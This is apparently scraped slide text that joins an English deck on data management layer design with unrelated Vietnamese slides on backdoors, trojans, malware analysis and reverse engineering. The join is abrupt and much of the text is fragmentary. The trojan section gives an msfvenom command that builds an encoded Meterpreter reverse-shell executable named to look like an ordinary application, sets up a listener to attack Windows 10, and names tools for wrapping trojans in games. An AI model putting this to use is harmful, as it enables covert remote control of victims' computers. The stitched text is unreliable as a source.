Professional Documents
Culture Documents
LAYER DESIGN
Nhóm 6
Lại Đức Long
Bạch Hoàng Hạ
Nông Nguyễn Nguyên Phương
Cái Xuân Trung
Nguyễn Anh Tuấn
Nguyễn Quang Du
Objectives
■ Become familiar with several object persistence formats.
■ Be able to map problem domain objects to di fferent object persistence formats.
■ Be able to apply the steps of normalization to a relational database.
■ Be able to optimize a relational database for object storage and access.
■ Become familiar with indexes for relational databases.
■ Be able to estimate the size of a relational database.
■ Understand the affect of nonfunctional requirements on the data management layer.
■ Be able to design the data access and manipulation classes.
.
01
OBJECT PERSISTENCE
FORMATS
Sequential Files
• Look
- up files
• Transaction files
• Audit file
• History file
Relational Databases
• Collection of tables
– Comprised of fields that define entities
– Primary key has unique values in each row of a table
– Foreign key is primary key of another table
• Tables related to each other
– Primary key field of a table is a field of another table and
called a foreign key
– Relationship established by a foreign key of one table
connecting to the primary key of another table
Object-Relational Databases
• Object-relational database management systems (ORDBMSs) are relational database
management systems
• ORDBMSs have very good support for the typical data management operations
• Many of the ORDBMSs on the market still do not support all of the object-oriented
features that can appear in an object-oriented design
Mặt lợi của backdoor Mặt hại của backdoor
• Kiểm tra version của các ứng • Sử dụng backdoor để cài các
dụng phần mềm độc hại
• Xử lý bản quyền • Thu thập thông tin về bạn, các
• Một số website tích hợp trang web bạn truy cập trên
backdoor để thiết lập cấu hình Internet, những thứ bạn tải
chỉ dành riêng cho khách hàng xuống, tệp bạn mở, tên người
đó dùng, mật khẩu và bất kỳ thứ gì
khác có giá trị.
• Sử dụng máy tính nạn nhân
trong 1 cuộc tấn công DDOS
Trojan là gì ?
Trojan
Trojan là một loại phần mềm độc hại
thường được ngụy trang dưới dạng
phần mềm hợp pháp. Trojan có thể
được sử dụng bởi những kẻ trộm
mạng và tin tặc cố gắng truy cập vào
hệ thống của người dùng
Khi xâm nhập vào máy tính của bạn,
vi-rút Trojan hoạt động tương tự - nó
ẩn bên trong các chương trình dường
như vô hại hoặc cố gắng lừa bạn tải
xuống
MỤC ĐÍCH CỦA TROJAN
CÁCH NHẬN BIẾT CUỘC
TẤN CÔNG BẰNG TROJAN
• Trình duyệt của máy tính chuyển hướng đến những trang không rõ.
• Trình Anti-Virus bị vô hiệu hóa hoặc thuộc tính của nó không hoạt động.
• Tài khoản và mật khẩu bị thay đổi hoặc không chứng thực được.
• Hình nền và background thay đổi.
• Xuất hiện các báo cáo mua lạ trong thẻ tín dụng của mình.
• Ổ CD-ROM mở và đóng bởi nó.
• Thanh Taskbar biến mất.
• Cửa sổ thiết lập màu sắc bị thay đổi.
CÁC CỔNG PHỔ BIẾN ĐƯỢC
SỬ DỤNG BỞI TROJAN
Sử dụng Kali Linux dùng để tấn
công Win 10 bằng Metaploit
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.122.128
LPORT=5555 -f exe -e x86/shikata_ga_nai -i 10 > application.exe
Sử dụng exploit(multi/handler) và payload
windows/meterpreter/reverse_tcp để nghe ngóng
● Thông thường, game và những chương trình có tính hấp dẫn (phim s*x) được sử
dụng là wrapper.
● Để có thế phát tán các mã độc hay trojan / backdoor hacker thường đính kèm
những công cụ này vào những công cụ hợp lệ khác
Những công cụ đóng gói trojan :
1 2 3
Graffiti Silk Rope 2000 EliTeWrap
4 5
AutoIT
IconPlus
Trojan Construction
Kit và Trojan Maker
Trojan Construction Kit và Trojan Maker
● Trojan construction kit va trojan maker là những công cụ mà các hacker dùng để
t75 tạo ra các biến thể trojan / backdoor nguy hiểm của riêng mình
● Một số công cụ dùng để tạo trojan như Senna Spy Generator, Trojan Horse
Construction Kit, Pandora’s Box
Phòng Chống
Trojan
Phòng Chống Trojan
● Hiện nay có nhiều công cụ thương mại của phần mềm chống Virus, cũng như phát
hiện các loại spyware, trojan, backdor và mã độc hại khác
● Điểm chính trong cơ chế hoạt động của Trojan và Backdor là cài đặt một chương
trình trên máy tính. Vì thế cách tốt nhất để tránh nhiệm trojan là không nên cho
phép user bình thường có được quyền cài đặt chương trình tùy ý
Các khuyến cáo để phòng chống Trojan hiệu quả :
● Hạn chế sử dụng chung máy tính, cài đặt mật khẩu bảo vệ.
● Không mở các tập tin lạ không rõ nguồn gốc, chú ý các file có đuôi mở rộng: exe,
bat,com,…
● Không vào các trang web lạ, không click vào các đường link lạ.
● Không cài đặt các phần mềm lạ.
● Quét các port đang mở, các tiến trình đang chạy, những thay đổi với Registry,
những hoạt động mạng, …
● Chạy các phần mềm diệt Trojan.
Những Công Cụ Giám
Sát Port Và Dò Tìm
Trojan
Fport
●Truy xuất tập tin, mở các chương trình ứng dụng chậm.
●Khi duyệt web có các trang lạ xuất hiện
●Duyệt web chậm, nội dung các trang web hiển thị lên màn
hình chậm
●Góc phải màn hình xuất hiện cảnh báo : “Your computer is
infected” hoặc xuất hiện cửa sổ : “Virus Alert”
● Các file lạ tự động sinh ra khi mở ổ đĩa USB
● Xuất hiện các file có phần mở rộng .exe với tên trùng với tên các
thư mục
Sự khác biệt giữa
virus và worm
Virus Worm
● Có khả năng lây lan (sao ● Có khả năng lây lan (sao
chép từ máy tính này sang chép từ máy tính này sang
máy tính khác máy tính khác
Tập tin
Các tập tin hay hàm thư viên của hệ thống như DLL,INI
Disk cluster
● RE là 1 khái niệm rất rộng, bao gồm cả RE phần cứng và RE phần mềm
● Việc phân tích hoạt động cụ thể của một hệ thống hay 1 chương trình sẽ
được sử dụng trong việc bảo trì chính hệ thống hay chương trình đó
ỨNG DỤNG CỦA RE
● Tìm hiểu cách thức hoạt động của một modul hoặc một hệ thống
CÁC VẤN ĐỀ CHÍNH CỦA RE
● Với mỗi một nền tảng, hệ điều hành khác nhau ta có các chương trình được
xây dựng khác nhau, thực thi theo cách khác nhau
● Với đặc trưng của mỗi nền tảng, ta có những hướng khác nhau để tiếp cận,
những công cụ khác nhau để trợ giúp cho công việc.
● Với các hệ điều hành khác nhau ta sử dụng những công cụ khác nhau
● Những chương trình viết bằng ngôn ngữ khác nhau sẽ có những công cụ RE
khác nhau
MALWARE
ANALYSIS
KHÁI QUÁT
● Là quá trình xác định phần mềm độc hại cho đến khi xác minh rằng phần
mềm độc hại đã bị loại bỏ hoàn toàn
● Mục tiêu: thu được thông tin chi tiết và quan sát hành vi của phần mềm độc
hại
QUÁ TRÌNH
● Phòng thủ được xây dựng để bảo mật hệ thống và mạng của tổ chức.